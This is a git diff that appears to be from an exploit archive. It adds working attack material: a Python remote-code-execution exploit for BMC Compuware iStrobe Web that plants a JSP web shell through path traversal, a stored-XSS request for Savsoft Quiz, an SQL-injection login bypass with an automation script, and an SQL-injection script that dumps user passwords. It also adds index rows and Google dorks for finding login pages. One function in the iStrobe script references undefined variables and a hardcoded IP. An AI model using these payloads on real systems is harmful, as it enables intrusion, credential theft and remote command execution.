diff --git a/exploits/jsp/webapps/51991.py b/exploits/jsp/webapps/51991.py
new file mode 100755
index 000000000..c31ed7491
--- /dev/null
+++ b/exploits/jsp/webapps/51991.py
@@ -0,0 +1,74 @@
+#!/usr/bin/env python3
+
+# Exploit Title: Pre-auth RCE on Compuware iStrobe Web
+# Date: 01-08-2023
+# Exploit Author: trancap
+# Vendor Homepage: https://www.bmc.com/
+# Version: BMC Compuware iStrobe Web - 20.13
+# Tested on: zOS# CVE : CVE-2023-40304
+# To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)
+# The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.
+
+import requests
+import urllib.parse
+import argparse
+import sys
+
+def upload_web_shell(url):
+ data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@
+page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process
+p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader
+stdInput = new BufferedReader(new
+InputStreamReader(p.getInputStream()));BufferedReader stdError = new
+BufferedReader(new InputStreamReader(p.getErrorStream()));String
+s=\"\";while((s=stdInput.readLine()) !=
+null){out.println(s);};s=\"\";while((s=stdError.readLine()) !=
+null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"}
+ # If encoded, the web shell will not be uploaded properly
+ data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')
+
+ # Checking if web shell already uploaded
+ r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)
+ if r.status_code != 404:
+ return
+
+ r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data,
+verify=False)
+
+ if r.status_code == 200:
+ print(f"[+] Successfully uploaded web shell, it should be
+accessible at {url}/istrobe/jsp/userhelp/ws.jsp")
+ else:
+ sys.exit("[-] Something went wrong while uploading the web shell")
+
+def delete_web_shell(url):
+ paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"}
+ response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp",
+data=paramsPost, headers=headers, cookies=cookies)
+
+ if r.status_code == 200:
+ print(f"[+] Successfully deleted web shell")
+ else:
+ sys.exit("[-] Something went wrong while deleting the web shell")
+
+def run_cmd(url, cmd):
+ data = f"cmd={cmd}"
+ r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data,
+verify=False)
+
+ if r.status_code == 200:
+ print(r.text)
+ else:
+ sys.exit(f'[-] Something went wrong while executing "{cmd}" command')
+
+parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE')
+parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target')
+parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami')
+parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true')
+args = parser.parse_args()
+
+upload_web_shell(args.url)
+run_cmd(args.url, args.cmd)
+
+if args.rm:
+ delete_web_shell(args.url)
\ No newline at end of file
diff --git a/exploits/php/webapps/51988.txt b/exploits/php/webapps/51988.txt
new file mode 100644
index 000000000..77a7de096
--- /dev/null
+++ b/exploits/php/webapps/51988.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site
+Scripting
+# Date: 2024-01-03
+# Exploit Author: Eren Sen
+# Vendor: SAVSOFT QUIZ
+# Vendor Homepage: https://savsoftquiz.com
+# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
+# Version: < 6.0
+# CVE-ID: N/A
+# Tested on: Kali Linux / Windows 10
+# Vulnerabilities Discovered Date : 2024/01/03
+
+# Persistent Cross Site Scripting (XSS) Vulnerability
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: quiz_name
+
+# Proof of Concepts:
+
+https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13
+
+# HTTP Request:
+
+POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
+Host: demos1.softaculous.com
+Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
+Content-Length: 411
+Cache-Control: max-age=0
+Sec-Ch-Ua:
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: https://demos1.softaculous.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer:
+https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=
\ No newline at end of file
diff --git a/exploits/php/webapps/51989.txt b/exploits/php/webapps/51989.txt
new file mode 100644
index 000000000..955cb37de
--- /dev/null
+++ b/exploits/php/webapps/51989.txt
@@ -0,0 +1,131 @@
+# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass
+# Date: 02/10/2024
+# Exploit Author: Diyar Saadi
+# Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip
+# Version: V 1.2
+# Tested on: Windows 11 + XAMPP 8.0.30
+
+## Exploit Description ##
+
+SQL Injection Vulnerability in ofrs/admin/index.php :
+The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process.
+
+## Steps to reproduce ##
+
+1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php
+2- Enter the following payload from username-box : admin'or'1--
+3- Press Login button or press Enter .
+
+## Proof Of Concept [1] ##
+
+POST /ofrs/admin/index.php HTTP/1.1
+Host: localhost
+Content-Length: 46
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/ofrs/admin/index.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29
+Connection: close
+
+username=admin%27or%27--&inputpwd=&login=login
+
+## Proof Of Concept [ Python Based Script ] [2] ##
+
+import os
+import requests
+from selenium import webdriver
+from selenium.webdriver.common.by import By
+from selenium.webdriver.support.ui import WebDriverWait
+from selenium.webdriver.support import expected_conditions as EC
+import pyautogui
+
+
+banner = """
+
+
+
+
+
+
+
+
+░█████╗░███████╗██████╗░░██████╗ ░█████╗░███╗░░░███╗░██████╗
+██╔══██╗██╔════╝██╔══██╗██╔════╝ ██╔══██╗████╗░████║██╔════╝
+██║░░██║█████╗░░██████╔╝╚█████╗░ ██║░░╚═╝██╔████╔██║╚█████╗░
+██║░░██║██╔══╝░░██╔══██╗░╚═══██╗ ██║░░██╗██║╚██╔╝██║░╚═══██╗
+╚█████╔╝██║░░░░░██║░░██║██████╔╝ ╚█████╔╝██║░╚═╝░██║██████╔╝
+░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░ ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░
+# Code By : Diyar Saadi
+
+
+
+
+
+
+
+ """
+
+print(banner)
+
+payload_requests = input("Enter the payload: ")
+
+url_requests = "http://localhost/ofrs/admin/index.php"
+data = {
+ 'username': payload_requests,
+ 'password': 'password',
+ 'login': 'Login'
+}
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Custom-Header': 'Your-Custom-Value'
+}
+
+try:
+ response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False)
+
+ if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']:
+ print("Requests version: Admin Panel Successfully Bypassed !")
+
+ url_selenium = "http://localhost/ofrs/admin/index.php"
+
+ chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe"
+
+ chrome_options = webdriver.ChromeOptions()
+ chrome_options.add_argument("executable_path=" + chrome_driver_path)
+
+ driver = webdriver.Chrome(options=chrome_options)
+ driver.get(url_selenium)
+
+ pyautogui.typewrite(payload_requests)
+ pyautogui.press('tab')
+ pyautogui.typewrite(payload_requests)
+
+ pyautogui.press('enter')
+
+ WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php"))
+
+ screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png")
+ driver.save_screenshot(screenshot_path)
+ print(f"Selenium version: Screenshot saved as {screenshot_path}")
+
+ driver.quit()
+
+ else:
+ print("Requests version: Login failed.")
+except Exception as e:
+ print(f"An error occurred: {e}")
\ No newline at end of file
diff --git a/exploits/php/webapps/51990.py b/exploits/php/webapps/51990.py
new file mode 100755
index 000000000..a22b8eee5
--- /dev/null
+++ b/exploits/php/webapps/51990.py
@@ -0,0 +1,55 @@
+# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
+# Date: February 6, 2024
+# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
+# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
+# Tested on: Linux and Windows, XAMPP
+# CVE-2023-51951
+# Vendor: oretnom23
+# Version: v1.0
+# Exploit Description:
+# The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
+
+import requests
+from bs4 import BeautifulSoup
+import argparse
+
+def print_header():
+ print("\033[1m\nStock Management System v1.0\033[0m")
+ print("\033[1mSQL Injection Exploit\033[0m")
+ print("\033[96mby blu3ming\n\033[0m")
+
+def parse_response(target_url):
+ try:
+ target_response = requests.get(target_url)
+ soup = BeautifulSoup(target_response.text, 'html.parser')
+ textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
+
+ # Split the text using ',' as a delimiter
+ users = textarea_text.split(',')
+ for user in users:
+ # Split username and password using ':' as a delimiter
+ username, password = user.split(':')
+ print("| {:<20} | {:<40} |".format(username, password))
+ except:
+ print("No data could be retrieved. Try again.")
+
+def retrieve_data(base_url):
+ target_path = '/sms/admin/?page=purchase_order/manage_po&id='
+ payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
+
+ #Dump users table
+ target_url = base_url + target_path + payload
+ print("+----------------------+------------------------------------------+")
+ print("| {:<20} | {:<40} |".format("username", "password"))
+ print("+----------------------+------------------------------------------+")
+ parse_response(target_url)
+ print("+----------------------+------------------------------------------+\n")
+
+if __name__ == "__main__":
+ about = 'Unauthenticated SQL Injection Exploit - Stock Management System'
+ parser = argparse.ArgumentParser(description=about)
+ parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
+ args = parser.parse_args()
+ print_header()
+ retrieve_data(args.base_url)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 87d88938e..6167814a6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5748,6 +5748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25739,exploits/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp,,2005-05-27,2013-05-27,1,,,,,,https://www.securityfocus.com/bid/13794/info
25738,exploits/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp,,2005-05-27,2013-05-27,1,,,,,,https://www.securityfocus.com/bid/13793/info
26778,exploits/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,webapps,jsp,,2005-12-12,2013-07-12,1,CVE-2005-4206;OSVDB-21618,,,,,https://www.securityfocus.com/bid/15814/info
+51991,exploits/jsp/webapps/51991.py,"BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE",2024-04-13,trancap,webapps,jsp,,2024-04-13,2024-04-13,0,,,,,,
35707,exploits/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",webapps,jsp,,2011-05-05,2015-01-06,1,,,,,,https://www.securityfocus.com/bid/47731/info
35706,exploits/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",webapps,jsp,,2011-05-05,2015-01-06,1,,,,,,https://www.securityfocus.com/bid/47728/info
37260,exploits/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",webapps,jsp,8080,2015-06-10,2016-10-10,1,CVE-2015-3898;CVE-2015-3897;OSVDB-122082;OSVDB-122081,,,,,https://www.htbridge.com/advisory/HTB23259
@@ -24933,6 +24934,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip,
4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip,
48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
+51989,exploits/php/webapps/51989.txt,"Online Fire Reporting System OFRS - SQL Injection Authentication Bypass",2024-04-13,"Diyar Saadi",webapps,php,,2024-04-13,2024-04-13,0,,,,,,
41029,exploits/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php,,2017-01-12,2017-01-12,0,,,,,,
48827,exploits/php/webapps/48827.txt,"Online Food Ordering System 1.0 - Remote Code Execution",2020-09-23,"Eren Şimşek",webapps,php,,2020-09-23,2020-09-23,0,,,,,,
50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-20,"Abdullah Khawaja",webapps,php,,2021-09-20,2021-09-20,0,,,,,,
@@ -29249,6 +29251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48658,exploits/php/webapps/48658.txt,"Savsoft Quiz 5 - Persistent Cross-Site Scripting",2020-07-09,th3d1gger,webapps,php,,2020-07-09,2020-07-09,0,,,,,,
48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,,2020-08-18,2020-08-26,0,CVE-2020-24609,,,,,
48785,exploits/php/webapps/48785.txt,"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting",2020-09-03,"Hemant Patidar",webapps,php,,2020-09-03,2020-12-03,0,CVE-2020-24609,,,,,
+51988,exploits/php/webapps/51988.txt,"Savsoft Quiz v6.0 Enterprise - Stored XSS",2024-04-13,"Eren Sen",webapps,php,,2024-04-13,2024-04-13,0,,,,,,
30719,exploits/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,webapps,php,,2007-10-29,2014-01-06,1,CVE-2007-4863;OSVDB-38839,,,,,https://www.securityfocus.com/bid/26238/info
30718,exploits/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,webapps,php,,2007-10-29,2014-01-06,1,CVE-2007-4862;OSVDB-38287,,,,,https://www.securityfocus.com/bid/26237/info
2718,exploits/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,webapps,php,,2006-11-03,2016-11-28,1,OSVDB-30194;CVE-2006-5727,,,,,
@@ -30386,6 +30389,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",2021-06-14,"Riadh Benlamine",webapps,php,,2021-06-14,2021-06-14,0,,,,,,
48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,,2020-08-05,2020-08-05,0,,,,,,
48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,,2020-09-02,2020-09-02,0,,,,,,
+51990,exploits/php/webapps/51990.py,"Stock Management System v1.0 - Unauthenticated SQL Injection",2024-04-13,blu3ming,webapps,php,,2024-04-13,2024-04-13,0,,,,,,
42768,exploits/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-22,2017-09-22,0,,,,,,
50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Ghuliev,webapps,php,,2021-09-29,2021-09-29,0,,,,,,
13813,exploits/php/webapps/13813.html,"Store Locator - Cross-Site Request Forgery (Add Admin)",2010-06-10,JaMbA,webapps,php,,2010-06-09,,1,,,,,,
diff --git a/ghdb.xml b/ghdb.xml
index dde30f2f5..67df073c9 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -116386,6 +116386,26 @@ PsyDel
2024-02-06
Thomas Heverin
+
+ 8426
+ https://www.exploit-db.com/ghdb/8426
+ Vulnerable Servers
+ allintitle:"ITRS OP5 Monitor"
+ Dear Off Sec Team,
+
+Here is a new Google Dork:
+
+#GoogleDork allintitle:"ITRS OP5 Monitor"
+#Description login pages for network monitoring devices
+#Author *Girls Learn Cyber*
+#Date 4/12/2024
+
+ allintitle:"ITRS OP5 Monitor"
+ https://www.google.com/search?q=allintitle:"ITRS OP5 Monitor"
+
+ 2024-04-13
+ Thomas Heverin
+
388
https://www.exploit-db.com/ghdb/388
@@ -116885,6 +116905,22 @@ Ingeniero Civil en Inform�tica.
2012-05-15
anonymous
+
+ 8425
+ https://www.exploit-db.com/ghdb/8425
+ Vulnerable Servers
+ intitle:"FileCatalyst file transfer solution"
+ # Google Dork: intitle:"FileCatalyst file transfer solution"
+# Files Containing Juicy Info
+# Date: 19/03/2024
+# Exploit Kamran Saifullah
+
+ intitle:"FileCatalyst file transfer solution"
+ https://www.google.com/search?q=intitle:"FileCatalyst file transfer solution"
+
+ 2024-04-13
+ Kamran Saifullah
+
192
https://www.exploit-db.com/ghdb/192